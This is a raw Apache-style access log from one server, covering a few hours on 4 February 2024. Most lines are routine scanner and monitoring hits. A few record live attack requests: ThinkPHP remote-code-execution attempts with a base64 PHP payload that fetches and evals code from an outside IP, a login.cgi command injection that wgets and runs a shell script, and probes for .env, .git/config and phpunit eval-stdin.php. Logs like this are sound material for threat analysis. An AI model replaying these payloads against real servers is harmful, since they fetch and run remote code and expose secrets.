45.95.147.236 - - [04/Feb/2024:03:50:18 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
45.95.147.236 - - [04/Feb/2024:03:50:18 +0100] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='eval(base64_decode(\"aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9\"));' HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
176.97.210.229 - - [04/Feb/2024:03:50:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.101 - - [04/Feb/2024:03:51:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.155.88.231 - - [04/Feb/2024:03:52:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.128.232.191 - - [04/Feb/2024:03:52:47 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
192.155.90.118 - - [04/Feb/2024:03:53:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.168.172 - - [04/Feb/2024:03:55:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.33.80.243 - - [04/Feb/2024:03:55:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.128.232.191 - - [04/Feb/2024:03:57:25 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.97.210.231 - - [04/Feb/2024:03:59:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [04/Feb/2024:04:00:06 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:29 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:30 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:30 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.252.204 - - [04/Feb/2024:04:00:30 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.155.88.231 - - [04/Feb/2024:04:02:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [04/Feb/2024:04:03:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.235.24.87 - - [04/Feb/2024:04:05:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.87 - - [04/Feb/2024:04:05:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
192.155.88.231 - - [04/Feb/2024:04:07:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.87 - - [04/Feb/2024:04:08:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.87 - - [04/Feb/2024:04:08:17 +0100] "\x16\x03\x01" 501 318 "-" "-"
192.155.90.220 - - [04/Feb/2024:04:08:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.97.210.229 - - [04/Feb/2024:04:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.233.75.51 - - [04/Feb/2024:04:11:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:11:16 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:11:16 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:11:16 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
45.79.181.251 - - [04/Feb/2024:04:11:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.97.210.231 - - [04/Feb/2024:04:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
192.155.88.231 - - [04/Feb/2024:04:12:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [04/Feb/2024:04:17:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [04/Feb/2024:04:17:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.23 - - [04/Feb/2024:04:21:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.168.172 - - [04/Feb/2024:04:25:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [04/Feb/2024:04:27:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.40 - - [04/Feb/2024:04:29:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.129 - - [04/Feb/2024:04:29:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.30 - - [04/Feb/2024:04:29:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
194.233.75.51 - - [04/Feb/2024:04:29:44 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:29:45 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:29:45 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:04:29:45 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
198.235.24.182 - - [04/Feb/2024:04:35:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.171 - - [04/Feb/2024:04:35:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.128.232.191 - - [04/Feb/2024:04:35:33 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.146.62.139 - - [04/Feb/2024:04:36:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://141.98.10.26/devx.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.79.181.223 - - [04/Feb/2024:04:40:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.199.31.214 - - [04/Feb/2024:04:41:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
190.89.51.39 - - [04/Feb/2024:04:46:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
176.97.210.231 - - [04/Feb/2024:04:48:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [04/Feb/2024:04:50:00 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
65.49.20.69 - - [04/Feb/2024:04:57:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
64.62.197.136 - - [04/Feb/2024:04:57:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
64.62.197.124 - - [04/Feb/2024:04:59:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
64.62.197.128 - - [04/Feb/2024:04:59:58 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
65.49.20.69 - - [04/Feb/2024:05:00:47 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
65.49.20.69 - - [04/Feb/2024:05:01:45 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
172.105.128.11 - - [04/Feb/2024:05:07:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.97.210.231 - - [04/Feb/2024:05:14:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.168.172 - - [04/Feb/2024:05:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [04/Feb/2024:05:18:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.128.232.191 - - [04/Feb/2024:05:18:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.172.56.31 - - [04/Feb/2024:05:20:16 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
45.128.232.191 - - [04/Feb/2024:05:24:58 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
78.153.140.224 - - [04/Feb/2024:05:27:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.224 - - [04/Feb/2024:05:27:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:28:25 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:28:38 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:28:39 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:28:41 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:28:58 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
167.172.56.31 - - [04/Feb/2024:05:29:10 +0100] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
45.95.147.244 - - [04/Feb/2024:05:29:18 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.128.232.191 - - [04/Feb/2024:05:32:16 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
162.216.150.165 - - [04/Feb/2024:05:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.224 - - [04/Feb/2024:05:36:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.224 - - [04/Feb/2024:05:36:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
69.164.217.74 - - [04/Feb/2024:05:39:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.4 - - [04/Feb/2024:05:39:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.216.150.210 - - [04/Feb/2024:05:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
176.97.210.231 - - [04/Feb/2024:05:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:05:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:05:48:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.233.75.51 - - [04/Feb/2024:05:49:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:05:49:32 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:05:49:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [04/Feb/2024:05:49:33 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
146.19.24.23 - - [04/Feb/2024:05:50:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
195.191.219.133 - - [04/Feb/2024:06:01:41 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.133 - - [04/Feb/2024:06:01:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
45.227.254.49 - - [04/Feb/2024:06:08:01 +0100] "\x03" 501 316 "-" "-"
146.19.24.23 - - [04/Feb/2024:06:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:06:19:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.97.210.231 - - [04/Feb/2024:06:21:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.52 - - [04/Feb/2024:06:22:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.52 - - [04/Feb/2024:06:22:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
146.19.24.23 - - [04/Feb/2024:06:25:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [04/Feb/2024:06:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.52 - - [04/Feb/2024:06:33:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.52 - - [04/Feb/2024:06:33:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.196.8.126 - - [04/Feb/2024:06:36:50 +0100] "GET /test/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
185.196.8.126 - - [04/Feb/2024:06:36:50 +0100] "GET /inc/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2"
185.196.8.126 - - [04/Feb/2024:06:36:50 +0100] "GET /source/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4"
146.19.24.23 - - [04/Feb/2024:06:38:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
142.93.146.149 - - [04/Feb/2024:06:44:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.146.149 - - [04/Feb/2024:06:44:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.146.149 - - [04/Feb/2024:06:44:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:26 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
142.93.146.149 - - [04/Feb/2024:06:44:27 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
142.93.146.149 - - [04/Feb/2024:06:44:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.146.149 - - [04/Feb/2024:06:44:27 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:27 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:27 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:28 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:28 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:28 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:28 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.146.149 - - [04/Feb/2024:06:44:29 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.235.24.22 - - [04/Feb/2024:06:56:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.22 - - [04/Feb/2024:06:56:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Feb/2024:07:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.24 - - [04/Feb/2024:07:01:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Feb/2024:07:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:04:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:05:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:06:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.231 - - [04/Feb/2024:07:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
139.99.9.160 - - [04/Feb/2024:07:07:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [04/Feb/2024:07:07:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:08:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:09:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
